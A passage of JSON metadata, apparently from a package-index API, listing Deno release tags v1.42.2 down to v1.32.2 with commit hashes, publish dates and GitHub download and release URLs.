purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ec